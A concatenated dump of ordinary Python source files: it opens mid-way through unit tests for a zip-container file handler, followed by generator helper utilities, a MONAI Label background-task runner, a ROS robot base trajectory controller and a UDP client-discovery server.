['{}//{}//../'.format(ZIP_TEST_FILENAME_LIST["dir_name2"],
ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
True],
# not normalized path root
['{}//..//'.format(ZIP_TEST_FILENAME_LIST["dir_name2"]),
False],
# not normalized path beyond root
['//..//',
False],
# starting with slash
['/',
False]]
)
def test_isdir(self, path_or_prefix, expected):
with self.fs_handler.open_as_container(self.zip_file_path) as handler:
self.assertEqual(handler.isdir(path_or_prefix),
expected)
@parameterized.expand(NON_EXIST_LIST)
def test_isdir_non_exist(self, path_or_prefix):
with self.fs_handler.open_as_container(self.zip_file_path) as handler:
self.assertFalse(handler.isdir(path_or_prefix))
def test_mkdir(self):
with self.fs_handler.open_as_container(self.zip_file_path) as handler:
self.assertRaises(io.UnsupportedOperation, handler.mkdir, "test")
def test_makedirs(self):
with self.fs_handler.open_as_container(self.zip_file_path) as handler:
self.assertRaises(io.UnsupportedOperation,
handler.makedirs, "test/test")
def test_pickle(self):
pickle_file_name = "test_pickle.pickle"
test_data = {'test_elem1': b'balabala',
'test_elem2': 'balabala'}
pickle_zip = "test_pickle.zip"
with open(pickle_file_name, "wb") as f:
pickle.dump(test_data, f)
with ZipFile(pickle_zip, "w") as test_zip:
test_zip.write(pickle_file_name)
with self.fs_handler.open_as_container(pickle_zip) as handler:
with handler.open(pickle_file_name, 'rb') as f:
loaded_obj = pickle.load(f)
self.assertEqual(test_data, loaded_obj)
os.remove(pickle_file_name)
os.remove(pickle_zip)
@parameterized.expand([
# path ends with slash
['{}//'.format(ZIP_TEST_FILENAME_LIST["dir_name2"]),
True],
# not normalized path
['{}//{}'.format(ZIP_TEST_FILENAME_LIST["dir_name2"],
ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
True],
['{}//..//{}/{}'.format(ZIP_TEST_FILENAME_LIST["dir_name1"],
ZIP_TEST_FILENAME_LIST["dir_name2"],
ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
True],
['{}//..//{}/{}'.format(ZIP_TEST_FILENAME_LIST["dir_name1"],
ZIP_TEST_FILENAME_LIST["dir_name2"],
ZIP_TEST_FILENAME_LIST["zipped_file_name"][:-1]
),
False],
# # not normalized path
['{}//{}//../'.format(ZIP_TEST_FILENAME_LIST["dir_name2"],
ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
True],
# not normalized path root
['{}//..//'.format(ZIP_TEST_FILENAME_LIST["dir_name2"]),
False],
# not normalized path beyond root
['//..//',
False],
# starting with slash
['/',
False]]
)
def test_exists(self, path_or_prefix, expected):
with self.fs_handler.open_as_container(self.zip_file_path) as handler:
self.assertEqual(handler.exists(path_or_prefix),
expected)
@parameterized.expand(NON_EXIST_LIST)
def test_not_exists(self, non_exist_file):
with self.fs_handler.open_as_container(self.zip_file_path) as handler:
self.assertFalse(handler.exists(non_exist_file))
def test_remove(self):
with self.fs_handler.open_as_container(self.zip_file_path) as handler:
self.assertRaises(io.UnsupportedOperation,
handler.remove, "test/test", False)
def test_nested_zip(self):
with self.fs_handler.open_as_container(self.zip_file_path) as handler:
with handler.open_as_container(
self.nested_zip_path) as nested_zip:
with nested_zip.open(self.nested_zipped_file_path) as f:
self.assertEqual(f.read(), self.nested_test_string_b)
with nested_zip.open(self.nested_zipped_file_path, "r") as f:
self.assertEqual(f.read(), self.nested_test_string)
@parameterized.expand([
# path ends with slash
['{}//'.format(ZIP_TEST_FILENAME_LIST["dir_name2"]),
'{}/'.format(ZIP_TEST_FILENAME_LIST["dir_name2"])],
# not normalized path
['{}//{}'.format(ZIP_TEST_FILENAME_LIST["dir_name2"],
ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
'{}/{}'.format(ZIP_TEST_FILENAME_LIST["dir_name2"],
ZIP_TEST_FILENAME_LIST["zipped_file_name"])],
['{}//..//{}/{}'.format(ZIP_TEST_FILENAME_LIST["dir_name1"],
ZIP_TEST_FILENAME_LIST["dir_name2"],
ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
'{}/{}'.format(ZIP_TEST_FILENAME_LIST["dir_name2"],
ZIP_TEST_FILENAME_LIST["zipped_file_name"])],
['{}//{}//../'.format(ZIP_TEST_FILENAME_LIST["dir_name2"],
ZIP_TEST_FILENAME_LIST["zipped_file_name"]),
'{}/'.format(ZIP_TEST_FILENAME_LIST["dir_name2"])]
])
def test_stat(self, path_or_prefix, expected):
with self.fs_handler.open_as_container(self.zip_file_path) as handler:
self.assertEqual(expected, handler.stat(path_or_prefix).filename)
@parameterized.expand([
# not normalized path root
'{}//..//'.format(ZIP_TEST_FILENAME_LIST["dir_name2"]),
# not normalized path beyond root
'//..//',
# root
'/'] + NON_EXIST_LIST)
def test_stat_non_exist(self, path_or_prefix):
with self.fs_handler.open_as_container(self.zip_file_path) as handler:
with self.assertRaises(FileNotFoundError):
handler.stat(path_or_prefix)
def test_stat_file(self):
test_file_name = 'testdir2/testfile1'
expected = ZipFile(self.zip_file_path).getinfo(test_file_name)
with self.fs_handler.open_as_container(self.zip_file_path) as handler:
stat = handler.stat(test_file_name)
self.assertIsInstance(stat, pfio.containers.zip.ZipFileStat)
self.assertTrue(stat.filename.endswith(test_file_name))
self.assertEqual(stat.size, expected.file_size)
self.assertEqual(stat.mode, expected.external_attr >> 16)
self.assertFalse(stat.isdir())
expected_mtime = datetime(*expected.date_time).timestamp()
self.assertIsInstance(stat.last_modified, float)
self.assertEqual(stat.last_modified, expected_mtime)
for k in ('filename', 'orig_filename', 'comment', 'create_system',
'create_version', 'extract_version', 'flag_bits',
'volume', 'internal_attr', 'external_attr', 'CRC',
'header_offset', 'compress_size', 'compress_type'):
self.assertEqual(getattr(stat, k), getattr(expected, k))
def test_stat_directory(self):
test_dir_name = 'testdir2/'
expected = ZipFile(self.zip_file_path).getinfo(test_dir_name)
with self.fs_handler.open_as_container(self.zip_file_path) as handler:
stat = handler.stat(test_dir_name)
self.assertIsInstance(stat, pfio.containers.zip.ZipFileStat)
self.assertTrue(stat.filename.endswith(test_dir_name))
self.assertEqual(stat.size, expected.file_size)
self.assertEqual(stat.mode, expected.external_attr >> 16)
self.assertTrue(stat.isdir())
expected_mtime = datetime(*expected.date_time).timestamp()
self.assertIsInstance(stat.last_modified, float)
self.assertEqual(stat.last_modified, expected_mtime)
for k in ('filename', 'orig_filename', 'comment', 'create_system',
'create_version', 'extract_version', 'flag_bits',
'volume', 'internal_attr', 'external_attr', 'CRC',
'header_offset', 'compress_size', 'compress_type'):
self.assertEqual(getattr(stat, k), getattr(expected, k))
@pytest.mark.skipif(sys.version_info < (3, 6),
reason="requires python3.6 or higher")
def test_writing_after_listing(self):
testfile_name = "testfile3"
test_string = "this is a written string\n"
with self.fs_handler.open_as_container(
os.path.abspath(self.zip_file_path)) as handler:
list(handler.list())
self.assertEqual(handler.zip_file_obj_mode, "r")
with handler.open(testfile_name, "w") as zipped_file:
zipped_file.write(test_string)
self.assertEqual(handler.zip_file_obj_mode, "w")
@pytest.mark.skipif(sys.version_info > (3, 5),
reason="requires python3.5 or lower")
def test_mode_w_exception(self):
testfile_name = "testfile3"
test_string = "this is a written string\n"
with self.fs_handler.open_as_container(
os.path.abspath(self.zip_file_path)) as handler:
with self.assertRaises(ValueError):
with handler.open(testfile_name, "w") as zipped_file:
zipped_file.write(test_string)
class TestZipHandlerWithLargeData(unittest.TestCase):
def setUp(self):
# The following zip layout is created for all the tests
# outside.zip
# | - testfile1
n = 1 << 20
self.test_string = make_random_str(n)
self.fs_handler = pfio.create_handler("posix")
# the most outside zip
self.zip_file_name = "outside"
# nested zip and nested file
self.tmpdir = tempfile.TemporaryDirectory()
# test file
self.testfile_name = "testfile1"
# paths used in making outside.zip
testfile_path = os.path.join(self.tmpdir.name, self.testfile_name)
# paths used in tests
self.zip_file_path = self.zip_file_name + ".zip"
with open(testfile_path, "w") as tmpfile:
tmpfile.write(self.test_string)
# this will include outside.zip itself into the zip
make_zip(self.zip_file_path,
root_dir=self.tmpdir.name,
base_dir=".")
def tearDown(self):
self.tmpdir.cleanup()
pfio.remove(self.zip_file_path)
def test_read_multi_processes(self):
barrier = multiprocessing.Barrier(2)
with self.fs_handler.open_as_container(
os.path.abspath(self.zip_file_path)) as handler:
with handler.open(self.testfile_name) as f:
f.read()
def func():
# accessing the shared container
with handler.open(self.testfile_name) as f:
barrier.wait()
f.read()
p1 = multiprocessing.Process(target=func)
p2 = multiprocessing.Process(target=func)
p1.start()
p2.start()
p1.join(timeout=1)
p2.join(timeout=1)
self.assertEqual(p1.exitcode, 0)
self.assertEqual(p2.exitcode, 0)
NO_DIRECTORY_FILENAME_LIST = {
"dir1_name": "testdir1",
"dir2_name": "testdir2",
"dir3_name": "testdir3",
"testfile1_name": "testfile1",
"testfile2_name": "testfile2",
"testfile3_name": "testfile3",
"testfile4_name": "testfile4",
}
class TestZipHandlerListNoDirectory(unittest.TestCase):
def setUp(self):
# The following zip layout is created for all the tests
# The difference is despite showing in the following layout for
# readabilty, the directories are not included in the zip
# outside.zip
# | - testdir1
# | - | - testfile1
# | - | - testdir2
# | - | - | - testfile2
# | - testdir3
# | | - testfile3
# | - testfile4
self.test_string = "this is a test string\n"
self.fs_handler = pfio.create_handler("posix")
# the most outside zip
self.zip_file_name = "outside.zip"
# nested zip and nested file
self.tmpdir = tempfile.TemporaryDirectory()
# directory and file
self.dir1_name = NO_DIRECTORY_FILENAME_LIST["dir1_name"]
self.dir2_name = NO_DIRECTORY_FILENAME_LIST["dir2_name"]
self.dir3_name = NO_DIRECTORY_FILENAME_LIST["dir3_name"]
self.testfile1_name = NO_DIRECTORY_FILENAME_LIST["testfile1_name"]
self.testfile2_name = NO_DIRECTORY_FILENAME_LIST["testfile2_name"]
self.testfile3_name = NO_DIRECTORY_FILENAME_LIST["testfile3_name"]
self.testfile4_name = NO_DIRECTORY_FILENAME_LIST["testfile4_name"]
# paths used in making outside.zip
dir1_path = os.path.join(self.tmpdir.name, self.dir1_name)
dir2_path = os.path.join(dir1_path, self.dir2_name)
dir3_path = os.path.join(self.tmpdir.name, self.dir3_name)
testfile1_path = os.path.join(dir1_path, self.testfile1_name)
testfile2_path = os.path.join(dir2_path, self.testfile2_name)
testfile3_path = os.path.join(dir3_path, self.testfile3_name)
testfile4_path = os.path.join(self.tmpdir.name, self.testfile4_name)
# paths used in tests
for dir in [dir1_path, dir2_path, dir3_path]:
os.mkdir(dir)
for file_path in [testfile1_path, testfile2_path,
testfile3_path, testfile4_path]:
with open(file_path, "w") as f:
f.write(self.test_string)
# create zip without directory
self.pwd = os.getcwd()
os.chdir(self.tmpdir.name)
cmd = ["zip", "-rD", self.zip_file_name, "."]
process = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
assert stderr == b""
def tearDown(self):
os.chdir(self.pwd)
self.tmpdir.cleanup()
@parameterized.expand([
# default case get the first level from the root
["", [NO_DIRECTORY_FILENAME_LIST["dir1_name"],
NO_DIRECTORY_FILENAME_LIST["dir3_name"],
NO_DIRECTORY_FILENAME_LIST["testfile4_name"]],
False],
# Problem 1 in issue #66
[NO_DIRECTORY_FILENAME_LIST["dir1_name"],
[NO_DIRECTORY_FILENAME_LIST["testfile1_name"],
NO_DIRECTORY_FILENAME_LIST["dir2_name"]],
False],
# problem 2 in issue #66
[os.path.join(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
NO_DIRECTORY_FILENAME_LIST["dir2_name"]),
[NO_DIRECTORY_FILENAME_LIST["testfile2_name"]],
False],
# not normalized path
['{}//{}//../'.format(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
NO_DIRECTORY_FILENAME_LIST["testfile1_name"]),
[NO_DIRECTORY_FILENAME_LIST["testfile1_name"],
NO_DIRECTORY_FILENAME_LIST["dir2_name"]],
False],
# not normalized path root
['{}//..//'.format(NO_DIRECTORY_FILENAME_LIST["dir1_name"]),
[NO_DIRECTORY_FILENAME_LIST["dir1_name"],
NO_DIRECTORY_FILENAME_LIST["dir3_name"],
NO_DIRECTORY_FILENAME_LIST["testfile4_name"]],
False],
# not normalized path beyond root
['//..//',
[NO_DIRECTORY_FILENAME_LIST["dir1_name"],
NO_DIRECTORY_FILENAME_LIST["dir3_name"],
NO_DIRECTORY_FILENAME_LIST["testfile4_name"]],
False],
# not normalized path beyond root
['{}//..//'.format(NO_DIRECTORY_FILENAME_LIST["dir1_name"]),
[NO_DIRECTORY_FILENAME_LIST["dir1_name"],
NO_DIRECTORY_FILENAME_LIST["dir3_name"],
NO_DIRECTORY_FILENAME_LIST["testfile4_name"]],
False],
# starting with slash
['/', [NO_DIRECTORY_FILENAME_LIST["dir1_name"],
NO_DIRECTORY_FILENAME_LIST["dir3_name"],
NO_DIRECTORY_FILENAME_LIST["testfile4_name"]],
False],
# recursive test
['',
[os.path.join(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
NO_DIRECTORY_FILENAME_LIST["testfile1_name"]),
os.path.join(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
NO_DIRECTORY_FILENAME_LIST["dir2_name"],
NO_DIRECTORY_FILENAME_LIST["testfile2_name"]),
os.path.join(NO_DIRECTORY_FILENAME_LIST["dir3_name"],
NO_DIRECTORY_FILENAME_LIST["testfile3_name"]),
NO_DIRECTORY_FILENAME_LIST["testfile4_name"]],
True],
[NO_DIRECTORY_FILENAME_LIST["dir1_name"],
[NO_DIRECTORY_FILENAME_LIST["testfile1_name"],
os.path.join(NO_DIRECTORY_FILENAME_LIST["dir2_name"],
NO_DIRECTORY_FILENAME_LIST["testfile2_name"])],
True],
# problem 2 in issue #66
[NO_DIRECTORY_FILENAME_LIST["dir1_name"],
[NO_DIRECTORY_FILENAME_LIST["testfile1_name"],
os.path.join(NO_DIRECTORY_FILENAME_LIST["dir2_name"],
NO_DIRECTORY_FILENAME_LIST["testfile2_name"])],
True],
# not normalized path
['{}//{}//../'.format(
NO_DIRECTORY_FILENAME_LIST["dir1_name"],
NO_DIRECTORY_FILENAME_LIST["testfile1_name"]),
[NO_DIRECTORY_FILENAME_LIST["testfile1_name"],
os.path.join(NO_DIRECTORY_FILENAME_LIST["dir2_name"],
NO_DIRECTORY_FILENAME_LIST["testfile2_name"])],
True],
# not normalized path root
['{}//..//'.format(NO_DIRECTORY_FILENAME_LIST["dir2_name"]),
[os.path.join(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
NO_DIRECTORY_FILENAME_LIST["testfile1_name"]),
os.path.join(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
NO_DIRECTORY_FILENAME_LIST["dir2_name"],
NO_DIRECTORY_FILENAME_LIST["testfile2_name"]),
os.path.join(NO_DIRECTORY_FILENAME_LIST["dir3_name"],
NO_DIRECTORY_FILENAME_LIST["testfile3_name"]),
NO_DIRECTORY_FILENAME_LIST["testfile4_name"]],
True],
# not normalized path beyond root
['//..//',
[os.path.join(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
NO_DIRECTORY_FILENAME_LIST["testfile1_name"]),
os.path.join(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
NO_DIRECTORY_FILENAME_LIST["dir2_name"],
NO_DIRECTORY_FILENAME_LIST["testfile2_name"]),
os.path.join(NO_DIRECTORY_FILENAME_LIST["dir3_name"],
NO_DIRECTORY_FILENAME_LIST["testfile3_name"]),
NO_DIRECTORY_FILENAME_LIST["testfile4_name"]],
True],
# not normalized path beyond root
['{}//..//../'.format(NO_DIRECTORY_FILENAME_LIST["dir2_name"]),
[os.path.join(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
NO_DIRECTORY_FILENAME_LIST["testfile1_name"]),
os.path.join(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
NO_DIRECTORY_FILENAME_LIST["dir2_name"],
NO_DIRECTORY_FILENAME_LIST["testfile2_name"]),
os.path.join(NO_DIRECTORY_FILENAME_LIST["dir3_name"],
NO_DIRECTORY_FILENAME_LIST["testfile3_name"]),
NO_DIRECTORY_FILENAME_LIST["testfile4_name"]],
True],
# starting with slash
['/',
[os.path.join(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
NO_DIRECTORY_FILENAME_LIST["testfile1_name"]),
os.path.join(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
NO_DIRECTORY_FILENAME_LIST["dir2_name"],
NO_DIRECTORY_FILENAME_LIST["testfile2_name"]),
os.path.join(NO_DIRECTORY_FILENAME_LIST["dir3_name"],
NO_DIRECTORY_FILENAME_LIST["testfile3_name"]),
NO_DIRECTORY_FILENAME_LIST["testfile4_name"]],
True]
])
def test_list(self, path_or_prefix, expected_list, recursive):
with self.fs_handler.open_as_container(self.zip_file_name) as handler:
zip_generator = handler.list(path_or_prefix,
recursive=recursive)
zip_list = list(zip_generator)
self.assertEqual(sorted(expected_list),
sorted(zip_list))
@parameterized.expand([
# non_exist_file
['does_not_exist', FileNotFoundError],
# not exist but share the prefix
['t', FileNotFoundError],
# broken path
['{}//t/'.format(NO_DIRECTORY_FILENAME_LIST["dir1_name"]),
FileNotFoundError],
# list a file
['{}//{}///'.format(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
NO_DIRECTORY_FILENAME_LIST["testfile1_name"]),
NotADirectoryError],
# list a non_exist_dir but share the surfix
['{}/'.format(NO_DIRECTORY_FILENAME_LIST["dir1_name"][:-1]),
FileNotFoundError]
])
def test_list_with_errors(self, path_or_prefix, error):
with self.fs_handler.open_as_container(self.zip_file_name) as handler:
with self.assertRaises(error):
list(handler.list(path_or_prefix))
with self.assertRaises(error):
list(handler.list(path_or_prefix, recursive=True))
@parameterized.expand([
# path ends with slash
['{}//'.format(NO_DIRECTORY_FILENAME_LIST["dir1_name"]), True],
# not normalized path
['{}//{}'.format(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
NO_DIRECTORY_FILENAME_LIST["testfile1_name"]),
False],
['{}//..//{}/{}'.format(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
NO_DIRECTORY_FILENAME_LIST["dir2_name"],
NO_DIRECTORY_FILENAME_LIST["testfile1_name"]),
False],
# problem 2 in issue #66
[NO_DIRECTORY_FILENAME_LIST["dir1_name"], True],
# not normalized path
['{}//{}//../'.format(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
NO_DIRECTORY_FILENAME_LIST["testfile1_name"]),
True],
# not normalized path root
['{}//..//'.format(NO_DIRECTORY_FILENAME_LIST["dir1_name"]), False],
# not normalized path beyond root
['//..//', False],
# not normalized path beyond root
['{}//..//'.format(NO_DIRECTORY_FILENAME_LIST["dir1_name"]), False],
# starting with slash
['/', False]
])
def test_isdir(self, path_or_prefix, expected):
with self.fs_handler.open_as_container(self.zip_file_name) as handler:
self.assertEqual(handler.isdir(path_or_prefix),
expected)
@parameterized.expand([
["does_not_exist"],
["does_not_exist/"],
["does/not/exist"]
])
def test_isdir_not_exist(self, dir):
with self.fs_handler.open_as_container(self.zip_file_name) as handler:
self.assertFalse(handler.isdir(dir))
|
generator_utils.py
|
# Copyright (c) 2020 mingruimingrui
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the MIT-style license found in the
# LICENSE file in the root directory of this source tree.
"""Helper functions to work with generators"""
import time
import queue
import threading
from typing import Iterable, Generator
def chunk(g: Iterable, size=10000):
"""Formats output of iterable into chunks of equal sizes
Arguments:
g {Iterable} -- An iterable preferrably a generator
Keyword Arguments:
size {int} -- The size of each chunk (default: {10000})
Yields:
List[object] -- A list of items from `g`
"""
chunk = []
for item in g:
chunk.append(item)
if len(chunk) >= size:
yield chunk
chunk = []
if len(chunk) > 0:
yield chunk
def prefetch(g: Iterable, size=1) -> Generator:
"""Prefetch wrapper around a generator/iterable
Arguments:
g {Iterable} -- An iterable preferably a generator
Keyword Arguments:
size {int} -- The size of the prefetch queue (default: {1})
Yields:
object -- items from `g`
"""
coord = {'done': False}
prefetch_queue = queue.Queue(size)
def fill_prefetch_queue():
for item in g:
while not coord['done']:
try:
prefetch_queue.put(item, block=True, timeout=0.1)
except queue.Full:
continue
else:
break
if coord['done']:
break
# Wait for prefetch_queue to be completely consumed
while prefetch_queue.qsize() > 0:
time.sleep(0.1)
continue
coord['done'] = True
worker = threading.Thread(target=fill_prefetch_queue)
worker.setDaemon(True)
worker.start()
while not coord['done']:
try:
item = prefetch_queue.get(block=True, timeout=0.1)
except queue.Empty:
continue
else:
yield item
worker.join()
|
async_tasks.py
|
import functools
import json
import logging
import os
import os.path
import platform
import subprocess
import uuid
from collections import deque
from datetime import datetime
from threading import Thread
from typing import Dict
import psutil
from monailabel.config import settings
logger = logging.getLogger(__name__)
background_tasks: Dict = {}
background_processes: Dict = {}
def _task_func(task, method):
base_dir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))
script = "run_monailabel_app.bat" if any(platform.win32_ver()) else "run_monailabel_app.sh"
if os.path.exists(os.path.realpath(os.path.join(base_dir, "scripts", script))):
script = os.path.realpath(os.path.join(base_dir, "scripts", script))
cmd = [
script,
settings.APP_DIR,
settings.STUDIES,
method,
json.dumps(task["request"]),
]
logger.info(f"COMMAND:: {' '.join(cmd)}")
process = subprocess.Popen(
cmd,
stderr=subprocess.STDOUT,
stdout=subprocess.PIPE,
universal_newlines=True,
env=os.environ.copy(),
)
task_id = task["id"]
background_processes[method][task_id] = process
task["status"] = "RUNNING"
task["details"] = deque(maxlen=20)
plogger = logging.getLogger(f"task_{method}")
while process.poll() is None:
line = process.stdout.readline()
line = line.rstrip()
if line:
plogger.info(line)
task["details"].append(line)
logger.info("Return code: {}".format(process.returncode))
background_processes[method].pop(task_id, None)
process.stdout.close()
task["end_ts"] = datetime.today().strftime("%Y-%m-%d %H:%M:%S")
if task["status"] == "RUNNING":
task["status"] = "DONE" if process.returncode == 0 else "ERROR"
def run_background_task(request, method, debug=False):
task = {
"id": uuid.uuid4(),
"status": "SUBMITTED",
"request": request,
"start_ts": datetime.today().strftime("%Y-%m-%d %H:%M:%S"),
}
if background_tasks.get(method) is None:
background_tasks[method] = []
if background_processes.get(method) is None:
background_processes[method] = dict()
background_tasks[method].append(task)
if debug:
_task_func(task, method)
else:
thread = Thread(target=functools.partial(_task_func, task, method))
thread.start()
return task
def stop_background_task(method):
logger.info(f"Kill background task for {method}")
if not background_tasks.get(method) or not background_processes.get(method):
return None
task_id, process = next(iter(background_processes[method].items()))
children = psutil.Process(pid=process.pid).children(recursive=True)
for child in children:
logger.info(f"Kill:: Child pid is {child.pid}")
child.kill()
logger.info(f"Kill:: Process pid is {process.pid}")
process.kill()
background_processes[method].pop(task_id, None)
logger.info(f"Killed background process: {process.pid}")
task = [task for task in background_tasks[method] if task["id"] == task_id][0]
task["status"] = "STOPPED"
task["end_ts"] = datetime.today().strftime("%Y-%m-%d %H:%M:%S")
return task
def tasks(method):
"""
Returns List of all task ids
"""
return background_tasks.get(method, [])
def processes(method):
"""
Returns Dict of all task id => process
"""
return background_processes.get(method, dict())
def run_main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-a", "--app", required=True)
parser.add_argument("-s", "--studies", required=True)
parser.add_argument("-m", "--method", default="info")
parser.add_argument("-r", "--request", default="{}")
parser.add_argument("-d", "--debug", action="store_true")
args = parser.parse_args()
args.app = os.path.realpath(args.app)
args.studies = os.path.realpath(args.studies)
settings.APP_DIR = args.app
settings.STUDIES = args.studies
logging.basicConfig(
level=(logging.DEBUG if args.debug else logging.INFO),
format="[%(asctime)s.%(msecs)03d][%(levelname)5s](%(name)s) - %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
)
run_background_task(json.loads(args.request), args.method, debug=True)
if __name__ == "__main__":
run_main()
|
base_trajectory_controller.py
|
from brett2.PR2 import PR2
#roslib.load_manifest("nav_msgs"); import nav_msgs.msg as nm
import trajectory_msgs.msg as tm
import numpy as np
from numpy import sin, cos
import rospy
import scipy.interpolate as si
from Queue import Queue, Empty
from threading import Thread
import jds_utils.conversions as conv
import kinematics.kinematics_utils as ku
from time import time, sleep
class Spline2D(object):
def __init__(self,x,y):
self.Fs = [si.InterpolatedUnivariateSpline(x, ycol) for ycol in y.T]
def __call__(self, x,nu=0):
return np.array([F(x,nu=nu) for F in self.Fs]).T
class TrajectoryController:
def __init__(self):
self.brett = PR2()
self.sub = rospy.Subscriber("base_traj_controller/command", tm.JointTrajectory, self.callback)
self.q = Queue()
self.F = None
self.stop_requested = False
self.ctrl_loop_running = False
def callback(self, msg):
joints = []
ts = []
for jtp in msg.points:
joints.append((jtp.positions[0], jtp.positions[1], jtp.positions[2]))
ts.append(jtp.time_from_start.to_sec())
self.q.put( (np.array(joints),np.array(ts)) )
self.msg = msg
def listen_loop(self):
while not rospy.is_shutdown():
try:
joints, ts = self.q.get(timeout=.01)
if self.ctrl_loop_running: self.stop_requested = True
while self.ctrl_loop_running: sleep(.001)
ctrl_thread = Thread(target = self.control_loop, args=(joints, ts))
ctrl_thread.start()
except Empty:
pass
def control_loop(self,joints, ts):
raise
class BaseTrajectoryController(TrajectoryController):
def control_loop(self,joints,ts):
print "running control loop with new trajectory"
F = Spline2D(ts, joints)
t_start = time()
duration = ts[-1]
prev_err = None
prev_time = None
kp = 1
kd = .1
use_relative = False
frame_id = self.msg.header.frame_id
if "base" in frame_id:
use_relative = True
pos_start = self.brett.base.get_pose("odom_combined")
elif "odom_combined" in frame_id or "map" in frame_id:
pass
else:
raise Exception("invalid frame %s for base traj"%frame_id)
while True:
if rospy.is_shutdown():
return
if self.stop_requested:
self.ctrl_loop_running = False
rospy.loginfo("stop requested--leaving control loop")
return
t_elapsed = time() - t_start
if t_elapsed > duration+5:
rospy.loginfo("time elapsed (+1sec)--leaving control loop")
return
else:
if use_relative:
# invert transform from orig position
pos_cur = self.brett.base.get_pose("odom_combined")
pos_cur -= pos_start
a = pos_start[2]
pos_cur[:2] = np.array([[cos(a), sin(a)],[-sin(a), cos(a)]]).dot(pos_cur[:2])
else:
pos_cur = self.brett.base.get_pose("odom_combined")
if t_elapsed > duration: pos_targ = joints[-1]
else: pos_targ = F(t_elapsed, nu = 0)
pos_targ[2] = ku.closer_ang(pos_targ[2], pos_cur[2])
err = (pos_targ - pos_cur)
twist = kp*err
if prev_err is not None: twist += kd*(err - prev_err)/(t_elapsed - prev_time)
prev_err = err
prev_time = t_elapsed
a = pos_cur[2]
twist[0:2] = np.dot(
np.array([[np.cos(a), np.sin(a)],
[-np.sin(a), np.cos(a)]]) ,
twist[0:2])
self.brett.base.set_twist(twist)
pos_prev = pos_cur
sleep(.01)
if __name__ == "__main__":
import rospy
rospy.init_node("base_traj_controller", disable_signals = True)
controller = BaseTrajectoryController()
controller.listen_loop()
|
server.py
|
#!/usr/bin/env python
'''
Machine tracker server. Waits for connections. Once connected
it will save the updates to locations.
'''
import networking as nt
import socket
import threading
def discovery_thread(client_list_lock, client_list,end_event):
'''
This thread runs forever. It waits for a client discovery
request. If it recieves one it initiates a new client
class, if the client doesn't already exist.
'''
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Set sock opt so we can recv broadcast
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
broadcast_addr = nt.get_broadcast(nt.interface)
s.bind((broadcast_addr,nt.r_port))
#ip,port = s.getsockname()
s.settimeout(2)
while not end_event.isSet():
# Recieve the discovery requests
try:
data = s.recv(1500)
except socket.timeout:
data = ''
#print nt.split_msg(data)
if nt.is_client_discovery_request(data):
client_ip,client_port = nt.known_msg_parse(data)
# The dictionary is passed to the class
client_dict = {'ip':client_ip, 'port':client_port}
with client_list_lock:
# Check if the host exists already
for client in client_list:
if client.ip() == client_ip:
# TODO check port as well. If a client died it has a differnt port
if client.port() != client_port:
print "Client " + client_ip + " has a new port. Ending the old thread and starting a new one."
client.end()
print('Old client manager thread joined.')
client_list.remove(client)
continue
else:
print 'Client ' + client_ip + ' already in list.'
break
else: # Only happens if the for didn't break
print 'Appending ' + client_ip + ' to client list'
new_client = client_manager(client_dict)
client_list.append(new_client)
return
class client_manager():
def ip(self):
return self.client_ip
def port(self):
return self.client_port
def get_data(self):
with self.data_lock:
data = self.client_data[0]
self.client_data.pop()
return data
def end(self):
msg = nt.make_message(nt.server_msg['exit'],())
self.tx_socket.sendto(msg,self.tx_tuple)
self.end_event.set()
self.tx_thread.join()
self.rx_thread.join()
self.tx_socket.close()
self.rx_socket.close()
return
def client_tx_thread(self):
print('Tx thread started, sending to port ' + str(self.client_port))
msg = nt.make_message(nt.server_msg['discovery_reply'],(nt.get_ip_address(nt.interface),self.rx_port,self.client_interval))
self.tx_socket.sendto(msg,self.tx_tuple)
self.end_event.wait()
print('Tx thread ending')
return
def client_rx_thread(self):
print('Rx thread started, listening on IP ' + self.rx_ip + ' ' + str(self.rx_port))
while self.end_event.isSet() == False:
self.rx_socket.settimeout(self.client_interval+1)
try:
data = self.rx_socket.recv(1500)
print data
with self.data_lock:
self.client_data.append(data)
except socket.timeout:
print('RX timeout')
self.end_event.wait()
print('Rx thread ending')
return
def __init__(self,client_dict):
# Client manager thread
self.client_interval = 1
self.end_event = threading.Event()
self.client_ip = client_dict['ip']
self.client_port = client_dict['port']
self.data_lock = threading.RLock()
self.client_data = []
# Open new UDP socket to client UDP RX
self.tx_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.tx_tuple = (self.client_ip,int(self.client_port))
# Open new UDP socket on random UDP port. This socket talks to the client
self.rx_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.rx_socket.bind((nt.get_ip_address(nt.interface),0))
self.rx_ip, self.rx_port = self.rx_socket.getsockname()
self.tx_thread = threading.Thread(target=self.client_tx_thread)
self.rx_thread = threading.Thread(target=self.client_rx_thread)
self.rx_thread.start()
self.tx_thread.start()
print("Client " + self.client_ip + " created.")
